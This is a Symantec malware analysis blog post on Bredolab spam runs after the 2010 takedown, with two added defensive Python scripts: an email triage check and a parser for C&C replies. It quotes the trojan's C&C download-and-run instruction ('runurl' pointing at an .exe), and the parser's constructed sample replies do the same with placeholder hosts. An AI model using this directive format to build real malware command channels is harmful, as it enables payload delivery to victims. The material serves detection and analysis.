Bredolab is still in the wild
Posted on behalf of Jo Hurcombe and Manoj Venugopalan, Malware Analysts, Symantec Hosted Services
As many of us have already heard, the Bredolab botnet was recently taken down by the Dutch authorities. The official announcement reads:
“On October 25th 2010, the High Tech Crime Team of the Dutch National Crime Squad took down a very large botnet, containing at least 30 million infected computer systems worldwide since July 2009. These computers were infected with the malicious Bredolab trojan, through infected websites. Through these botnets, cybercriminals can spread large amounts of other viruses and create new botnets.
In close cooperation with a Dutch hosting provider, The Dutch Forensic Institute (NFI), the internet security company Fox-IT and GOVCERT, the computer emergency response team of the Dutch government, shut down 143 computer servers today”
But MessageLabs Intelligence has still been seeing separate Bredolab runs, each distributing a different payload, since yesterday morning. The first run started at 09:21 AM and ended at around 11:50 AM; the second started at 10:30 AM and stopped at 10:50 AM; the third started at 2:30 PM and stopped at 3:30 PM.
Figure A – Example of recent email with Bredolab attachment.
We have seen more than 750 Bredolab e-mails, nearly 400 of which targeted Spanish e-mail users. All of them carried a similar subject line referring to “DHL International”; the group behind Bredolab has been using DHL and UPS invoice subjects for a long time.
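The combination described above (a shipping-invoice subject and an attachment that is really a Windows executable hiding behind a document icon) is easy to screen for at the mail gateway without looking at the icon at all: the attachment's first two bytes give it away. The following triage check is an added example and is not Symantec or MessageLabs code; the sender, recipient, attachment name and the two-byte "MZ" stub it uses as a stand-in executable are all constructed for the demo and are not indicators from this post.

```python
"""Triage check for Bredolab-style lures: a DHL/UPS invoice subject carrying an
attachment whose payload starts with the DOS 'MZ' header, i.e. a Windows PE.

Added example, not Symantec/MessageLabs code. All addresses, subjects and
file names below are constructed placeholders, not indicators from the post.
"""
import email
import re
from email import policy
from email.message import EmailMessage

# Subject patterns the post says this campaign has reused for a long time.
LURE_SUBJECT = re.compile(r"\b(DHL|UPS)\b.*\b(International|Invoice)\b", re.IGNORECASE)

# Every Windows executable begins with the DOS stub signature "MZ".
PE_MAGIC = b"MZ"


def attachment_is_pe(part) -> bool:
    """True if the decoded MIME part starts with the 'MZ' signature."""
    data = part.get_payload(decode=True) or b""
    return data[:2] == PE_MAGIC


def triage(raw: bytes) -> dict:
    """Parse a raw RFC 822 message and return a verdict with its reasons."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    subject = str(msg.get("Subject", ""))
    reasons = []
    if LURE_SUBJECT.search(subject):
        reasons.append("lure subject")
    # Names are reported for the analyst; the verdict rests on the magic bytes,
    # since the visible name/icon is exactly what the lure manipulates.
    pe_attachments = [
        part.get_filename() or "<unnamed>"
        for part in msg.iter_attachments()
        if attachment_is_pe(part)
    ]
    if pe_attachments:
        reasons.append("PE attachment")
    return {
        "subject": subject,
        "pe_attachments": pe_attachments,
        "reasons": reasons,
        "block": "lure subject" in reasons and bool(pe_attachments),
    }


def build_sample(subject: str, filename: str, payload: bytes) -> bytes:
    """Build a constructed test message with one binary attachment."""
    msg = EmailMessage()
    msg["From"] = "noreply@example.invalid"  # constructed placeholder
    msg["To"] = "victim@example.invalid"     # constructed placeholder
    msg["Subject"] = subject
    msg.set_content("Please open the attached invoice.")
    msg.add_attachment(payload, maintype="application", subtype="octet-stream",
                       filename=filename)
    return msg.as_bytes()


# Constructed lure: DHL subject, double extension, minimal PE-looking stub.
LURE = build_sample("DHL International: Tracking number 1234",
                    "DHL_invoice.xls.exe",
                    b"MZ" + b"\x90" * 62 + b"PE\x00\x00")

# Constructed benign message: unrelated subject, plain-text attachment.
BENIGN = build_sample("Lunch tomorrow?", "notes.txt", b"see you at noon")


if __name__ == "__main__":
    print(triage(LURE))
    print(triage(BENIGN))
```

The verdict deliberately requires both signals: a PE attachment alone is common in legitimate mail at many organisations, and a DHL subject alone is just a shipping notice. Run on the constructed lure the check blocks; on the benign message it does not.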
Figure B – Installed Bredolab Trojan process using MS Excel icon
Like other Bredolab samples, this one uses a fake icon (a Microsoft Excel icon in our example) so that the executable passes for a document.
Once the user executes the file, it drops a few hidden files into the %system32% and %temp% folders. The downloader then hooks into a system process (svchost.exe in our example) and connects to its C&C server from there.
Figure C – Network trace of Bredolab Trojan receiving instructions
Figure D – Detailed network trace of the Bredolab instruction to download a fake security product
In the above example you can see that it contacts its C&C server at http://<removed>.ru, which replies with the URL of the payload to download:
[info] runurl: http://<removed>/test/<removed>.exe[/info]
At the time of writing, the Trojan uses this instruction to download and install a fake AV product without the user's knowledge.
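The instruction format shown in the trace above is simple enough to pull apart automatically, which is handy when you are turning packet captures into block lists. The parser below is an added example and is not Symantec or MessageLabs code: it extracts every `runurl:` target from `[info] ... [/info]` blocks in a captured response body. The sample responses it runs on are constructed for the demo (the hosts are example.invalid placeholders, not the real C&C from the post), and `runurl` is the only directive the post shows, so no other directive names are assumed.

```python
"""Extract payload-download instructions from Bredolab-style C&C replies.

The post shows the C&C answering the bot with a line of the form
    [info] runurl: http://<host>/<path>.exe[/info]

Added example, not Symantec/MessageLabs code. Sample bodies and hosts below
are constructed placeholders, not indicators from the post.
"""
import re
from urllib.parse import urlparse

# One [info]...[/info] block; DOTALL so a block may span lines.
INFO_BLOCK = re.compile(r"\[info\](.*?)\[/info\]", re.DOTALL | re.IGNORECASE)
# A runurl directive inside a block; the target runs to the next whitespace.
RUNURL = re.compile(r"runurl:\s*(\S+)", re.IGNORECASE)


def extract_runurls(body: str) -> list:
    """Return every runurl target found inside [info] blocks, in order."""
    urls = []
    for block in INFO_BLOCK.findall(body):
        for url in RUNURL.findall(block):
            # Ignore directives whose target is not an http(s) URL.
            if url.lower().startswith(("http://", "https://")):
                urls.append(url)
    return urls


def indicators(body: str) -> list:
    """Turn runurl targets into (host, path, filename) tuples for blocking."""
    out = []
    for url in extract_runurls(body):
        parsed = urlparse(url)
        filename = parsed.path.rsplit("/", 1)[-1]
        out.append((parsed.hostname, parsed.path, filename))
    return out


# Constructed sample responses from three captures. Hosts are placeholders.
SAMPLE_RESPONSES = [
    # Single instruction, same shape as the line in the post.
    "[info] runurl: http://cnc1.example.invalid/test/setup.exe[/info]",
    # Raw HTTP response with two directives in one block and an unrelated block.
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "[info]runurl: http://cnc2.example.invalid/dl/av.exe\n"
    "runurl: http://cnc2.example.invalid/dl/upd.exe[/info]\n"
    "[info]noop[/info]",
    # No instruction at all (e.g. a decoy page served to non-bots).
    "<html><body>nothing here</body></html>",
]


if __name__ == "__main__":
    for body in SAMPLE_RESPONSES:
        for host, path, name in indicators(body):
            print(f"block host={host} path={path} payload={name}")
```

Because the URL is captured up to the first whitespace, the parser copes with the post's layout, where `[/info]` immediately follows the `.exe` with no space, as well as with one directive per line. A response that carries no `[info]` block yields an empty list rather than an error, so the same function can be run over every HTTP body in a capture.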
Figure E – Example of fake security product installed by the Bredolab Trojan
Symantec Hosted Services detected all of this malware before it reached customers.